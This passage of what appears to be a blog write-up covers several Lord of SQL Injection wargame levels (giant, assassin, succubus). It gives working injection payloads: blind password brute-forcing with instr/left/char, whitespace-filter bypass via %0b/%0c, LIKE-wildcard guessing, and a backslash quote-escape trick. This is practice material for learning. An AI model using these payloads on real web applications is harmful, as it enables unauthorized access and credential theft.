<p>if <code>b</code> not in <code>a</code>, it&rsquo;ll return 0, else return &gt; 0</p>
<ul>
<li>Part 1: combine <code>instr</code> + <code>char</code> we can <code>select id='admin'</code></li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>instr(char(<span style="color:#ae81ff">97</span>,<span style="color:#ae81ff">100</span>,<span style="color:#ae81ff">109</span>,<span style="color:#ae81ff">105</span>,<span style="color:#ae81ff">110</span>),id) <span style="color:#75715e">-- return 1
</span></span></span></code></pre></div><ul>
<li>Part 2: combine <code>left</code> + <code>char</code> + <code>instr</code> to brute password</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>instr(<span style="color:#66d9ef">left</span>(pw,<span style="color:#ae81ff">1</span>),char([<span style="color:#ae81ff">48</span><span style="color:#f92672">-&gt;</span><span style="color:#ae81ff">57</span><span style="color:#f92672">|</span><span style="color:#ae81ff">97</span><span style="color:#f92672">-&gt;</span><span style="color:#ae81ff">122</span>]))
</span></span></code></pre></div><ul>
<li>Part 3: craft payload:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#f92672">?</span><span style="color:#66d9ef">no</span><span style="color:#f92672">=</span><span style="color:#ae81ff">0</span><span style="color:#f92672">||</span>(instr(char(<span style="color:#ae81ff">97</span>,<span style="color:#ae81ff">100</span>,<span style="color:#ae81ff">109</span>,<span style="color:#ae81ff">105</span>,<span style="color:#ae81ff">110</span>),id)<span style="color:#f92672">&gt;</span><span style="color:#ae81ff">0</span><span style="color:#f92672">&amp;&amp;</span>instr(<span style="color:#66d9ef">left</span>(pw,<span style="color:#ae81ff">1</span>),char(<span style="color:#ae81ff">53</span>))<span style="color:#f92672">&gt;</span><span style="color:#ae81ff">0</span>)
</span></span><span style="display:flex;"><span><span style="color:#f92672">?</span><span style="color:#66d9ef">no</span><span style="color:#f92672">=</span><span style="color:#ae81ff">0</span><span style="color:#f92672">||</span>(instr(char(<span style="color:#ae81ff">97</span>,<span style="color:#ae81ff">100</span>,<span style="color:#ae81ff">109</span>,<span style="color:#ae81ff">105</span>,<span style="color:#ae81ff">110</span>),id)<span style="color:#f92672">&gt;</span><span style="color:#ae81ff">0</span><span style="color:#f92672">&amp;&amp;</span>instr(<span style="color:#66d9ef">left</span>(pw,<span style="color:#ae81ff">2</span>),char(<span style="color:#ae81ff">53</span>,<span style="color:#ae81ff">50</span>))<span style="color:#f92672">&gt;</span><span style="color:#ae81ff">0</span>)
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">select</span> char(<span style="color:#ae81ff">53</span>,<span style="color:#ae81ff">50</span>,<span style="color:#ae81ff">100</span>,<span style="color:#ae81ff">99</span>,<span style="color:#ae81ff">51</span>,<span style="color:#ae81ff">57</span>,<span style="color:#ae81ff">57</span>,<span style="color:#ae81ff">49</span>)
</span></span><span style="display:flex;"><span><span style="color:#f92672">==&gt;</span> pw <span style="color:#f92672">=</span> <span style="color:#ae81ff">52</span>dc3991
</span></span></code></pre></div><h3 id="giant">giant</h3>
<p>The task we must complete is split <code>fromprob_giant</code> to <code>from prob_giant</code>.</p>
<p>The length of <code>shit</code> is 1, so we can&rsquo;t use <code>/**/</code>.</p>
<p>I wonder why author filter <code>\n</code>,<code>\r</code>,<code>\t</code>.</p>
<p>So I brute force <code>shit</code> param like this:</p>
<pre tabindex="0"><code>    shit=%0[a-z0-9]
</code></pre><p>Gotta, we can use <code>%0b</code> and <code>%0c</code> to bypass this filters.</p>
<h3 id="assassin">assassin</h3>
<p>It only filter <code>'</code> and pw param is in quote.</p>
<p>So we can&rsquo;t use condition here, but wait it use <code>like</code>.</p>
<p>First, we need to find out about <code>like</code></p>
<pre tabindex="0"><code>There are two wildcards often used in conjunction with the LIKE operator:

The percent sign (%) represents zero, one, or multiple characters
The underscore sign (_) represents one, single character
</code></pre><p>Now, let go to brute force</p>
<pre tabindex="0"><code>-- query % -&gt; guest
-- query 9% -&gt; guest
-- query 90% -&gt; still guest
-- query 902% -&gt; still guest
-- query 902e% -&gt; admin
-- Try with underscore
-- query ________ -&gt; guest
-- query 9_______ -&gt; guest
-- query 90______ -&gt; guest
-- query 902_____ -&gt; guest
-- query 902e____ -&gt; admin
</code></pre><p>From here, we can see <code>pw</code> of admin and guest have some similarities.</p>
<h3 id="succubus">Succubus</h3>
<p>The challenge is not hard, if you notice 2 param <code>id</code>,<code>pw</code>, you&rsquo;ll found solution.</p>
<p>Review the code below:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">preg_match</span>(<span style="color:#e6db74">&#39;/\&#39;/&#39;</span>,$_GET[<span style="color:#a6e22e">id</span>])) <span style="color:#66d9ef">exit</span>(<span style="color:#e6db74">&#34;HeHe&#34;</span>); <span style="color:#75715e">// filter &#39;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>  <span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">preg_match</span>(<span style="color:#e6db74">&#39;/\&#39;/&#39;</span>,$_GET[<span style="color:#a6e22e">pw</span>])) <span style="color:#66d9ef">exit</span>(<span style="color:#e6db74">&#34;HeHe&#34;</span>);
</span></span><span style="display:flex;"><span>  $query <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;select id from prob_succubus where id=&#39;</span><span style="color:#e6db74">{</span>$_GET[<span style="color:#a6e22e">id</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39; and pw=&#39;</span><span style="color:#e6db74">{</span>$_GET[<span style="color:#a6e22e">pw</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;&#34;</span>; 
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span>($result[<span style="color:#e6db74">&#39;id&#39;</span>]) <span style="color:#a6e22e">solve</span>(<span style="color:#e6db74">&#34;succubus&#34;</span>);  <span style="color:#75715e">// anything return from $query
</span></span></span></code></pre></div><p>Obviously, we can&rsquo;t use any condition command trick. Instead of, sign <code>\</code> is the best choice.</p>
<p>The payload will be look like:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>    Payload : id<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">\</span><span style="color:#f92672">&amp;</span>pw<span style="color:#f92672">=</span><span style="color:#66d9ef">or</span>(<span style="color:#ae81ff">1</span>)<span style="color:#75715e">-- -
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">Explain</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">select</span> id <span style="color:#66d9ef">from</span> prob_succubus <span style="color:#66d9ef">where</span> id<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;\&#39;</span> <span style="color:#66d9ef">and</span> pw<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;or(1)-- -&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">-- id=&#39;\&#39; and pw=&#39;,thus $_GET[pw] will be escaped
</span></span></span></code></pre></div>
    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
